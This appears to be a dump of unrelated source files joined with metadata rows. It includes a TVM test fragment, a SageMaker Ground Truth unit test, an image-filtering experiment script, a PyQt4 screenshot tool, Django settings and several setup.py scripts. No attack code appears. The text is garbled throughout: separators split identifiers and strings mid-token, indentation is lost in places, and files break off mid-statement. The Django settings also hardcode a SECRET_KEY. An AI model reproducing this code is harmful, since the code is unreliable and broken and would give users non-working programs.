        x = relay.var("x", shape=shape)
        y = relay.add(x, x)
        z = relay.add(y, x)
        f = relay.Function([x], z)
        mod = tvm.IRModule.from_expr(f)
        mod = relay.transform.InferType()(mod)
        return mod["main"]

    # Same function and target hit the cache; a different shape does not.
    z1 = engine.lower(get_func((10,)), "llvm")
    z2 = engine.lower(get_func((10,)), "llvm")
    z3 = engine.lower(get_func(()), "llvm")
    assert z1.same_as(z2)
    assert not z3.same_as(z1)

    # A different target also produces a distinct cache entry.
    if tvm.testing.device_enabled("cuda"):
        z4 = engine.lower(get_func(()), "cuda")
        assert not z3.same_as(z4)

    # Test JIT target
    for target in ["llvm"]:
        ctx = tvm.context(target)
        if tvm.testing.device_enabled(target):
            f = engine.jit(get_func((10,)), target)
            x = tvm.nd.array(np.ones(10).astype("float32"), ctx=ctx)
            y = tvm.nd.empty((10,), ctx=ctx)
            f(x, y)
            # Expect 3 * x from the (x + x) + x graph above.
            tvm.testing.assert_allclose(y.asnumpy(), x.asnumpy() * 3)

    engine.dump()
def test_compile_placeholder_bypass():
    """A var that flows straight to the output must build at opt_level 0."""
    engine = relay.backend.compile_engine.get()
    x = relay.var("x", shape=(2, 3))
    y = relay.var("y", shape=(2, 3))
    z = relay.var("z", shape=(2, 3))
    # x is returned untouched (placeholder bypass); y and z feed a real op.
    result = relay.Tuple([x, relay.op.concatenate([y, z], axis=0)])
    func = relay.Function(relay.analysis.free_vars(result), result)
    with tvm.transform.PassContext(opt_level=0):
        graph, lib, params = relay.build(tvm.IRModule.from_expr(func), "llvm")
def test_compile_injective_with_tuple():
x = relay.var("x", shape=(2, 3))
y = relay.var("y", shape=(2, 3))
x_transpose = relay.transpose(x)
output = relay.Tuple([x_transpose, y])
func = relay.Function([x, y], output)
relay.build(tvm.IRModule.from_expr(func), "l |
kubeflow/pipelines | components/aws/sagemaker/tests/unit_tests/tests/ground_truth/test_ground_truth_component.py | Python | apache-2.0 | 8,622 | 0.00116 | from common.sagemaker_component import SageMakerJobStatus
from ground_truth.src.sagemaker_ground_truth_spec import SageMakerGroundTruthSpec
from ground_truth.src.sagemaker_ground_truth_component import (
SageMakerGroundTruthComponent,
)
from tests.unit_tests.tests.ground_truth.test_ground_truth_spec import (
GroundTruthSpecTestCase,
)
import unittest
from unittest.mock import patch, MagicMock, ANY
class GroundTruthComponentTestCase(unittest.TestCase):
REQUIRED_ARGS = GroundTruthSpecTestCase.REQUIRED_ARGS
    @classmethod
    def setUp(cls):
        # Fresh component for each test.
        cls.component = SageMakerGroundTruthComponent()
        # Instantiate without calling Do(): set the job name directly so
        # request-building tests can run without the full Do() flow.
        cls.component._labeling_job_name = "my-labeling-job"
    @patch("ground_truth.src.sagemaker_ground_truth_component.super", MagicMock())
    def test_do_sets_name(self):
        """Do() honors an explicit --job_name and otherwise generates one."""
        named_spec = SageMakerGroundTruthSpec(
            self.REQUIRED_ARGS + ["--job_name", "test-job"]
        )
        unnamed_spec = SageMakerGroundTruthSpec(self.REQUIRED_ARGS)

        self.component.Do(named_spec)
        self.assertEqual("test-job", self.component._labeling_job_name)

        # Without --job_name a unique timestamped id is used instead.
        with patch(
            "ground_truth.src.sagemaker_ground_truth_component.SageMakerComponent._generate_unique_timestamped_id",
            MagicMock(return_value="unique"),
        ):
            self.component.Do(unnamed_spec)
            self.assertEqual("unique", self.component._labeling_job_name)
    def test_create_ground_truth_job(self):
        """Minimal required args produce the expected CreateLabelingJob request."""
        spec = SageMakerGroundTruthSpec(self.REQUIRED_ARGS)
        request = self.component._create_job_request(spec.inputs, spec.outputs)

        self.assertEqual(
            request,
            {
                "LabelingJobName": "my-labeling-job",
                "LabelAttributeName": None,
                "InputConfig": {
                    "DataSource": {
                        "S3DataSource": {"ManifestS3Uri": "s3://fake-bucket/manifest"}
                    }
                },
                "OutputConfig": {
                    "S3OutputPath": "s3://fake-bucket/output",
                    "KmsKeyId": "",
                },
                "RoleArn": "arn:aws:iam::123456789012:user/Development/product_1234/*",
                "HumanTaskConfig": {
                    "WorkteamArn": None,
                    "UiConfig": {"UiTemplateS3Uri": "s3://fake-bucket/ui_template"},
                    "PreHumanTaskLambdaArn": "",
                    "TaskTitle": "fake-image-labelling-work",
                    "TaskDescription": "fake job",
                    "NumberOfHumanWorkersPerDataObject": 1,
                    "TaskTimeLimitInSeconds": 180,
                    "AnnotationConsolidationConfig": {
                        "AnnotationConsolidationLambdaArn": ""
                    },
                },
                "Tags": [],
            },
        )
def test_create_ground_truth_job_all_args(self):
spec = SageMakerGroundTruthSpec(
self.REQUIRED_ARGS
+ [
"--label_attribute_name",
"fake-attribute",
"--max_human_labeled_objects",
"10",
"--max_percent_objects",
"50",
"--enable_auto_labeling",
"True",
"--initial_model_arn",
"fake-model-arn",
"--task_availibility",
"30",
"--max_concurrent_tasks",
"10",
"--task_keywords",
"fake-keyword",
"--worker_type",
"public",
"--no_adult_content",
"True",
"--no_ppi",
"True",
"--tags",
'{"fake_key": "fake_value"}',
]
)
request = self.component._create_job_request(spec.inputs, spec.outputs)
self.assertEqual(
request,
{
"LabelingJobName": "my-labeling-job",
"LabelAttributeName": "fake-attribute",
"InputConfig": {
"DataSource": {
"S3DataSource": {"ManifestS3Uri": "s3://fake-bucket/manifest"}
},
"DataAttributes": {
"ContentClassifiers": [
"FreeOfAdultContent",
"FreeOfPersonallyIdentifiableInformation",
]
},
},
"OutputConfig": {
"S3OutputPath": "s3://fake-bucket/output",
"KmsKeyId": "",
},
"RoleArn": "arn:aws:iam::123456789012:user/Development/product_1234/*",
"StoppingConditions": {
"MaxHumanLabeledObjectCount": 10,
"MaxPercentageOfInputDatasetLabeled": 50,
},
"LabelingJobAlgorithmsConfig": {
"LabelingJobAlgorithmSpecificationArn": "",
"InitialActiveLearningModelArn": "",
"LabelingJobResourceConfig": {"VolumeKmsKeyId": ""},
},
"HumanTaskConfig": {
"WorkteamArn": "arn:aws:sagemaker:us-west-2:394669845002:workteam/public-crowd/default",
"UiConfig": {"UiTemplateS3Uri": "s3://fake-bucket/ui_template"},
"PreHumanTaskLambdaArn": "",
"TaskKeywords": ["fake-keyword"],
"TaskTitle": "fake-image-labelling-work",
"TaskDescription": "fake job",
"NumberOfHuma | nWorkersPerDataObject": 1,
"TaskTimeLimitInSeconds": 180,
"TaskAvailabilityLifetimeInSeconds": 30,
"MaxConcurrentTaskCount": 10,
| "AnnotationConsolidationConfig": {
"AnnotationConsolidationLambdaArn": ""
},
"PublicWorkforceTaskPrice": {
"AmountInUsd": {
"Dollars": 0,
"Cents": 0,
"TenthFractionsOfACent": 0,
}
},
},
"Tags": [{"Key": "fake_key", "Value": "fake_value"}],
},
)
    def test_get_job_status(self):
        """Labeling-job states map to the expected SageMakerJobStatus values."""
        self.component._sm_client = MagicMock()

        # In-progress state: not completed yet.
        self.component._sm_client.describe_labeling_job.return_value = {
            "LabelingJobStatus": "Starting"
        }
        self.assertEqual(
            self.component._get_job_status(),
            SageMakerJobStatus(is_completed=False, raw_status="Starting"),
        )

        # Terminal success state.
        self.component._sm_client.describe_labeling_job.return_value = {
            "LabelingJobStatus": "Completed"
        }
        self.assertEqual(
            self.component._get_job_status(),
            SageMakerJobStatus(is_completed=True, raw_status="Completed"),
        )

        # Terminal failure state surfaces FailureReason as the error message.
        self.component._sm_client.describe_labeling_job.return_value = {
            "LabelingJobStatus": "Failed",
            "FailureReason": "lolidk",
        }
        self.assertEqual(
            self.component._get_job_status(),
            SageMakerJobStatus(
                is_completed=True,
                raw_status="Failed",
                has_error=True,
                error_message="lolidk",
            ),
        )
def test_after_job_completed(self):
spec = SageMakerGroundTruthSpec(self.REQUIRED_ARGS)
auto_labeling_spec = SageMakerGroundTruthSpec(
self.REQUIRED_ARGS + ["--enable_auto_labeling", "True"]
)
self.component._sm_client = mock_client = MagicMock()
mock_client.describe_labeling_job.return_value = {
"LabelingJobOutput": {
"OutputDatasetS3Uri": "s3://path/",
"FinalActiveLearningModelArn": "model-arn",
}
}
self.component._after_job_complete({}, {}, spec.inputs, spec.outputs)
self.assertEqual(spec.outputs.active_learning_model_arn |
facundoq/ipim | tp1/py/tp.py | Python | gpl-3.0 | 10,677 | 0.013206 | from pylab import *
from math import exp, sqrt
from image import *
from filters import *
from nibabel import load
import numpy
import image_processing
import image as img
import os
# This module generates
class C:
    """Config class: a collection of constants shared by the experiments."""
    # Input/output locations for the report figures.
    output_dir = '../report/img/results/'
    input_dir = '../report/img/input/'
    output_dir_plots = '../report/img/plots/'
    # algorithm parameters to generate Sim and Reg plots
    noise_levels = [0, 0.25, 0.5,1,2,3,5] # noise levels to distort the images
    gaussian_sigmas = [0.5,1,2]
    bilateral_sigmaDs = [0.5,1,2]
    bilateral_sigmaRs = [2,20]
    # plot configuration variables
    column_names=['sim','reg','e','noise']
    colors=['g','r','c','m','y','b'] # for different sigmaD
    markers=['<','>','v','^'] # for different sigmaR
    lines=['-',''] # for different types of algorithms
    # algorithm parameters to generate result images
    default_noise_level = 1.5
    default_noise_level_mri = 1.5
    default_gaussian_sigma = 1
    default_gaussian_sigma_noise = 1.5
    default_bilateral_sigma = (1, 7)
    default_bilateral_sigma_noise = (1.5, 7)
    default_number_of_bins = 256
# generate the plot for filtering algorithms
def generate_plot_filtering(results,name,column_y):
    """Plot metric *column_y* (0=Sim, 1=Reg) vs. noise for each filter setting.

    Draws one curve per gaussian sigma and one per (sigmaD, sigmaR) bilateral
    pair, then saves the figure under C.output_dir_plots.
    """
    xlabel('Noise ($\sigma$)')
    for sigma in C.gaussian_sigmas:
        # Rows of results['gaussian'] are [s, r, e, noise, sigma].
        gaussian = results['gaussian']
        gaussian = gaussian[gaussian[:, 4] == sigma]
        label = 'Gaussian, $\sigma=%.2f$' % sigma
        style='o'+C.colors[C.gaussian_sigmas.index(sigma)]+'--'
        plot(gaussian[:, 3], gaussian[:, column_y], style,label=label)
        legend(loc=2)
    for sigmaD in C.bilateral_sigmaDs:
        for sigmaR in C.bilateral_sigmaRs:
            # Rows of results['bilateral'] are [s, r, e, noise, sigmaD, sigmaR].
            bilateral= results['bilateral']
            bilateral = bilateral[bilateral[:, 4] == sigmaD]
            bilateral = bilateral[bilateral[:, 5] == sigmaR]
            label = 'Bilateral, $\sigma_d=%.2f$, $\sigma_r=%.2f$' % (sigmaD,sigmaR)
            style=C.markers[C.bilateral_sigmaRs.index(sigmaR)]+C.colors[C.bilateral_sigmaDs.index(sigmaD)]+'-'
            plot(bilateral[:, 3], bilateral[:, column_y],style,label=label )
            legend(loc=2)
    savepngfig(C.output_dir_plots+name+'_filtering_'+C.column_names[column_y])
# generate the plot for otsu's algorithm, with and without noise and different
# types of filters
def generate_plot_otsu(results,name,column_y):
    """Plot metric *column_y* (0=Sim, 1=Reg) vs. noise for Otsu thresholding.

    Compares plain Otsu against Otsu applied after gaussian and bilateral
    pre-filtering, then saves the figure under C.output_dir_plots.
    """
    xlabel('Noise ($\sigma$)')
    otsu = results['otsu']
    plot(otsu[:, 3], otsu[:, column_y],'-.', label='otsu')
    legend(loc=2)
    for sigma in C.gaussian_sigmas:
        otsu = results['otsu_gaussian']
        otsu = otsu[otsu[:, 4] == sigma]
        label = 'Otsu with gaussian, $\sigma=%.2f$' % sigma
        style='o'+C.colors[C.gaussian_sigmas.index(sigma)]+'--'
        plot(otsu[:, 3], otsu[:, column_y], style,label=label)
        legend(loc=1)
    for sigmaD in C.bilateral_sigmaDs:
        for sigmaR in C.bilateral_sigmaRs:
            otsu = results['otsu_bilateral']
            otsu = otsu[otsu[:, 4] == sigmaD]
            otsu = otsu[otsu[:, 5] == sigmaR]
            label = 'Otsu with bilateral, $\sigma_d=%.2f$, $\sigma_r=%.2f$' % (sigmaD,sigmaR)
            style=C.markers[C.bilateral_sigmaRs.index(sigmaR)]+C.colors[C.bilateral_sigmaDs.index(sigmaD)]+'-'
            plot(otsu[:, 3], otsu[:, column_y],style, label=label)
            legend(loc=1)
    savepngfig(C.output_dir_plots+name+'_otsu_'+C.column_names[column_y])
# Generate all the plot images according to the results dictionary
# for image with given name
def generate_plot_images(results, name):
    """Generate all plot images for *name* from the *results* dictionary.

    Each results list is converted to an array so the plotting helpers can
    slice it by column; one figure is produced per (plot type, metric) pair.
    """
    for k in results:
        results[k] = array(results[k])
    functions=[generate_plot_otsu,generate_plot_filtering]
    labels=[(0,'$Sim(I,J)$'),(1,'$Reg(J)$')]
    for f in functions:
        for (column_y,label) in labels:
            figure()
            ylabel(label)
            f(results,name,column_y)
            xlim(0,C.noise_levels[-1]*1.5)
# generate a dictionary with Sim, Reg and E values for every combination of the
# algorithm parameters in class C, for a given image with a certain name
def generate_plots(image, name):
    """Compute Sim/Reg/E for every noise/filter combination and plot them.

    For each noise level in C.noise_levels the image is distorted, then
    evaluated with Otsu thresholding and with gaussian/bilateral filtering
    (each also followed by Otsu), accumulating rows into *results*.
    """
    results = {}
    results['otsu'] = []
    results['otsu_bilateral'] = []
    results['otsu_gaussian'] = []
    results['bilateral'] = []
    results['gaussian'] = []
    # Reference segmentation of the clean image.
    otsu, t = image_processing.threshold_otsu(image, C.default_number_of_bins)
    for noise in C.noise_levels:
        print 'Image %s, Noise %.2f ' % (name, noise)
        image_with_noise = add_gaussian_noise(image, noise)
        print 'Image %s, otsu ' % (name)
        otsu_noise, t = image_processing.threshold_otsu(image_with_noise, C.default_number_of_bins)
        s, r, e = transformation_energy(otsu, otsu_noise)
        results['otsu'].append([s, r, e, noise])
        for sigma in C.gaussian_sigmas:
            print 'Image %s, gaussian s=%.2f ' % (name, sigma)
            gaussian = gaussian_filter(image_with_noise, sigma)
            s, r, e = transformation_energy(image, gaussian)
            results['gaussian'].append([s, r, e, noise, sigma])
            # Otsu-after-gaussian is only evaluated for the smaller sigmas.
            if (sigma<2):
                otsu_gaussian, t = image_processing.threshold_otsu(gaussian, C.default_number_of_bins)
                s, r, e = transformation_energy(otsu, otsu_gaussian)
                results['otsu_gaussian'].append([s, r, e, noise, sigma])
        for sigmaD in C.bilateral_sigmaDs:
            for sigmaR in C.bilateral_sigmaRs:
                print 'Image %s, bilateral sd=%.2f, sr=%.2f ' % (name, sigmaD,sigmaR)
                bilateral = bilateral_filter(image_with_noise, sigmaD, sigmaR)
                s, r, e = transformation_energy(image, bilateral)
                results['bilateral'].append([s, r, e, noise, sigmaD, sigmaR])
                otsu_bilateral, t = image_processing.threshold_otsu(bilateral, C.default_number_of_bins)
                s, r, e = transformation_energy(otsu, otsu_bilateral)
                results['otsu_bilateral'].append([s, r, e, noise, sigmaD, sigmaR])
    print 'Generating plot images...'
    generate_plot_images(results, name)
# Generate the images that will be visually inspected
# For the given image, calculate:
# 1) Bilateral, gaussian and otsu's without noise
# 2) Bilateral, gaussian and otsu's with noise
# 3) Otsu's with noise, but after applying Bilateral, gaussian filtering
# Result images are saved with the given name as a prefix
def generate_result_images(image, name):
image = add_gaussian_noise(image, 0)
print 'Processing image %s' % name
save_image_png(image, C.output_dir + name)
if (name.startswith('mri')):
noise = C.default_noise_level_mri
else:
noise = C.default_noise_level
image_with_default_noise = add_gaussian_noise(image, noise)
save_image_png(image_with_default_noise, C.output_dir + name + '_noise')
print 'Image %s: bilateral' % name
(sigmaD, sigmaR) = C.default_bilateral_sigma
bilateral = bilateral_filter(image, sigmaD, sigmaR)
save_image_png(bilateral, C.output_dir + name + '_bilateral')
## for sigmaR in [1,2,3,4,5,7,8,9,10,11,12,13,14,15,17,18]:
## bilateral = bilateral_filter(image, sigmaD, sigmaR)
## if (sigmaR<10):
## n='0'+str(sigmaR)
## else:
## n=str(sigmaR)
## save_image_png(bilateral, C.output_dir + name + '_bilateral_'+n)
print 'Image %s: bilateral noise' % name
(sigmaD, sigmaR) = C.default_bilateral_sigma_noise
bilateral_noise = bilateral_filter(image_with_default_noise, sigmaD, sigmaR)
save_image_png(bilateral_noise, C.output_dir + name + '_noise_bilateral')
print 'Image %s: gaussian' % name
sigma = C.default_gaussian_sigma
gaussian = gaussian_filter(image, sigma)
save_image_png(gaussian, C.output_dir + name + '_gaussian')
print 'Image %s: gaussian noise' % name
sigma = C.default_gaussian_sigma_noise
gaussian_noise = gaussian_filter(image_with_default_noise, sigma)
save_image_png(gaussian_noise, C.output_dir + name + '_noise_gaussian')
print 'Image %s: Otsu' % name
otsu, t = image_processing.threshold_otsu(image, C.default_number_of_bins)
save_image_png(otsu, C.output_dir + name |
jasonhejna/raspberrytraffic | makeimage.py | Python | mit | 1,014 | 0.016765 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class browser(QWebView):
    """Off-screen PyQt4 web view that loads a fixed local page and saves a
    screenshot of it.

    The view is fixed at 1920x1080; once the page has finished loading, a
    single-shot timer waits 17 seconds (presumably to let dynamic content
    render -- TODO confirm the delay) before capturing the frame to
    ``webimage.png`` and exiting the process.
    """

    def __init__(self, parent=None):
        super(browser, self).__init__(parent)
        self.setFixedSize(1920, 1080)
        # Fixed: "QTimer()" / "setInterval" had been corrupted mid-token in
        # the original text.
        self.timerScreen = QTimer()
        self.timerScreen.setInterval(17000)
        self.timerScreen.setSingleShot(True)
        self.timerScreen.timeout.connect(self.takeScreenshot)
        # Start the countdown only after the page load completes.
        self.loadFinished.connect(self.timerScreen.start)
        self.load(QUrl("file:///home/pi/index1.html"))

    def takeScreenshot(self):
        """Render the page's main frame into an image, save it, and exit."""
        image = QImage(self.page().mainFrame().contentsSize(), QImage.Format_ARGB32)
        painter = QPainter(image)
        self.page().mainFrame().render(painter)
        painter.end()
        # image.save(self.title() + ".png")
        image.save("webimage.png")
        # Relies on `sys` being imported by the __main__ guard below, so this
        # only works when the script is run directly.
        sys.exit()
if __name__ == "__main__":
    # `sys` is imported here (not at the top of the file) and becomes a
    # module global, which browser.takeScreenshot() relies on for sys.exit();
    # this works only when the script is run directly.
    import sys
    app = QApplication(sys.argv)
    main = browser()
    app.exec_()
|
saurabhkumar1989/programming_question_python | questions/integer_number.py | Python | apache-2.0 | 58 | 0.068966 |
a = 1224
while a:
| temp = a%10
print temp
a = a//10
| |
istinspring/imscrape-template | api.py | Python | mit | 143 | 0 | from utils.api_factory import ApiFac | tory
# Obtain the shared API application instance from the project factory.
api = ApiFactory.get_instance()

if __name__ == '__main__':
    # Listen on all interfaces, port 8000 (development server).
    # Fixed: the host string had been corrupted ('0.0. | 0.0') in the
    # original text.
    api.run(host='0.0.0.0', port=8000)
|
mjumbewu/django-model-filters | example_project/settings.py | Python | bsd-3-clause | 5,060 | 0.002174 | # Django settings for example project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'example_project.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 's6a32pk==8#0lfor)s69^fcnl)6znc3poy3sa%2j$-o$rouny1'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'example_project.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django_nose',
'south',
'model_filters',
'pepulator_factory',
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
michaelorr/helga-spook | setup.py | Python | gpl-3.0 | 1,038 | 0.004817 | from setuptools import setup, find_packages
from helga_spook import __version | __ as version
# Package metadata for the helga-spook IRC bot plugin.
# Fixed: the GPLv3 classifier string had been corrupted mid-token.
setup(name='helga-spook',
      version=version,
      description=('prints nsa buzzwords'),
      classifiers=['Development Status :: 4 - Beta',
                   'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
                   'Operating System :: OS Independent',
                   'Programming Language :: Python',
                   'Topic :: Software Development :: Libraries :: Python Modules',
                   'Topic :: Communications :: Chat :: Internet Relay Chat'],
      keywords='irc bot nsa spook emacs',
      author='Michael Orr',
      author_email='michael@orr.co',
      url='https://github.com/michaelorr/helga-spook',
      license='LICENSE',
      packages=find_packages(),
      include_package_data=True,
      py_modules=['helga_spook.plugin'],
      zip_safe=True,
      # Register the plugin with helga's plugin entry-point group.
      entry_points = dict(
          helga_plugins=[
              'spook = helga_spook.plugin:spook',
          ],
      ),
      )
|
CIGIHub/django-icontact-integration | setup.py | Python | gpl-2.0 | 1,167 | 0 | import os
from setuptools import setup
from setuptools import find_packages
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# Package metadata for the iContact integration Django app.
# Fixed: two classifier strings had been corrupted mid-token
# ('MIT License', 'Dynamic Content').
setup(
    name='icontact-integration',
    version='0.2.2',
    packages=find_packages(),
    include_package_data=True,
    license='GPL v2',
    description='iContact Integration.',
    long_description=README,
    author='Caroline Simpson',
    author_email='csimpson@cigionline.org',
    classifiers=[
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        # NOTE(review): this classifier says MIT but `license` above says
        # 'GPL v2' -- confirm which license actually applies.
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
    ],
)
|
dlintott/gns3-ppa | setup.py | Python | gpl-2.0 | 14,696 | 0.010207 | #!/usr/bin/env python
# vim: expandtab ts=4 sw=4 sts=4 fileencoding=utf-8:
"""Setup script for the GNS3 packages."""
import sys, os, shutil, platform
sys.path.append('./src')
from distutils.core import setup, Extension
from glob import glob
# current version of GNS3
VERSION = "0.8.6"
# Best-effort cleanup of previous build artifacts; failures are ignored.
try:
    if os.access('./build', os.F_OK):
        shutil.rmtree('./build')
    if os.access('./dist', os.F_OK):
        shutil.rmtree('./dist')
except OSError:
    # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit and
    # genuine programming errors still propagate; filesystem failures
    # (the only expected errors from os.access/shutil.rmtree) stay ignored.
    pass
if sys.platform.startswith('win'):
import struct
bitness = struct.calcsize("P") * 8
# Set the path to Qt plugins directory
if bitness == 32:
# for 32-bit python
PYQT4_DIR = r'C:\Python27-32bit\Lib\site-packages\PyQt4'
elif bitness == 64:
# for 64-bit python
PYQT4_DIR = r'C:\Python27-64bit\Lib\site-packages\PyQt4'
else:
# should seriously not happen ...
print "Fatal error: bitness cannot be detected!"
sys.exit(1)
try:
import py2exe
except ImportError:
raise RuntimeError, "Cannot import py2exe"
data_files = [("Langs", glob(r'src\GNS3\Langs\*.qm')),
('src\GNS3\Dynagen\configspec'),
('COPYING'),
('baseconfig.txt'),
('baseconfig_sw.txt'),
(PYQT4_DIR + r'\QtXml4.dll'),
("iconengines", glob(PYQT4_DIR + r'\plugins\iconengines\*.dll')),
("imageformats", glob(PYQT4_DIR + r'\plugins\imageformats\*.dll'))]
# Settings for py2exe, packages values are to tell to py2exe about hidden imports
setup(windows=[{"script":"gns3.pyw",
"icon_resources": [(1, r'..\gns3_icon.ico')]}],
zipfile=None,
data_files=data_files,
options={"py2exe":
{
"includes": ["sip"],
"dll_excludes": ["MSVCP90.dll", "POWRPROF.dll", "MSWSOCK.dll"],
"optimize": 1,
# CLSID for VirtualBox COM (http://www.py2exe.org/index.cgi/IncludingTypelibs)
# Do not need this anymore because the typelib wrapper is dynamically generated.
#"typelibs": [('{46137EEC-703B-4FE5-AFD4-7C9BBBBA0259}',0,1,3)], #
"packages": ["GNS3.Ui.ConfigurationPages.Page_ATMSW",
"GNS3.Ui.ConfigurationPages.Page_ATMBR",
"GNS3.Ui.ConfigurationPages.Page_Cloud",
"GNS3.Ui.ConfigurationPages.Page_ETHSW",
"GNS3.Ui.ConfigurationPages.Page_Hub",
"GNS3.Ui.ConfigurationPages.Page_FRSW",
"GNS3.Ui.ConfigurationPages.Page_IOSRouter",
"GNS3.Ui.ConfigurationPages.Page_P | IX",
"GNS3.Ui.ConfigurationPages.Page_ASA",
"GNS3.Ui.ConfigurationPages.Page_AWP",
"GNS3.Ui.ConfigurationPages.Page_JunOS",
"GNS3.Ui.ConfigurationPa | ges.Page_IDS",
"GNS3.Ui.ConfigurationPages.Page_Qemu",
"GNS3.Ui.ConfigurationPages.Page_VirtualBox",
"GNS3.Ui.ConfigurationPages.Page_DecorativeNode",
"GNS3.Ui.ConfigurationPages.Page_PreferencesDynamips",
"GNS3.Ui.ConfigurationPages.Page_PreferencesGeneral",
"GNS3.Ui.ConfigurationPages.Page_PreferencesCapture",
"GNS3.Ui.ConfigurationPages.Page_PreferencesQemu",
"GNS3.Ui.ConfigurationPages.Page_PreferencesVirtualBox",
"GNS3.Ui.ConfigurationPages.Page_PreferencesDeployementWizard",
]
}
}
)
# Compile qemuwrapper
sys.path.append('./qemuwrapper')
setup(console=['qemuwrapper/qemuwrapper.py'], options = {"py2exe": {"dll_excludes": ["POWRPROF.dll", "MSWSOCK.dll"]}}, zipfile=None)
# Compile vboxwrapper
sys.path.append('./vboxwrapper')
setup(console=['vboxwrapper/vboxwrapper.py'], options = {"py2exe": {"dll_excludes": ["POWRPROF.dll", "MSWSOCK.dll"]}}, zipfile=None)
elif sys.platform.startswith('darwin'):
import setuptools
QTDIR = r'/Developer/Applications/Qt'
data_files = [('', glob(r'src/GNS3/Langs/*.qm')),
('src/GNS3/Dynagen/configspec'),
('qemuwrapper/qemuwrapper.py'),
# ('vboxwrapper/vboxwrapper.py'),
# ('vboxwrapper/vboxcontroller_4_1.py'),
# ('vboxwrapper/tcp_pipe_proxy.py'),
('baseconfig.txt'),
('baseconfig_sw.txt'),
('COPYING'),
("../PlugIns/iconengines", [QTDIR + r'/plugins/iconengines/libqsvgicon.dylib']),
("../PlugIns/imageformats", [QTDIR + r'/plugins/imageformats/libqgif.dylib',
QTDIR + r'/plugins/imageformats/libqjpeg.dylib',
QTDIR + r'/plugins/imageformats/libqsvg.dylib'])
]
APP = ['gns3.pyw']
OPTIONS = {'argv_emulation': False,
'semi_standalone': True,
'site_packages': True,
'optimize': 1,
'iconfile': 'gns3.icns',
'includes': ['sip',
'PyQt4.QtCore',
'PyQt4.QtGui',
'PyQt4.QtSvg',
'PyQt4.QtXml',
'PyQt4.QtNetwork',
'PyQt4.QtWebKit',
'GNS3.Ui.ConfigurationPages.Page_ATMSW',
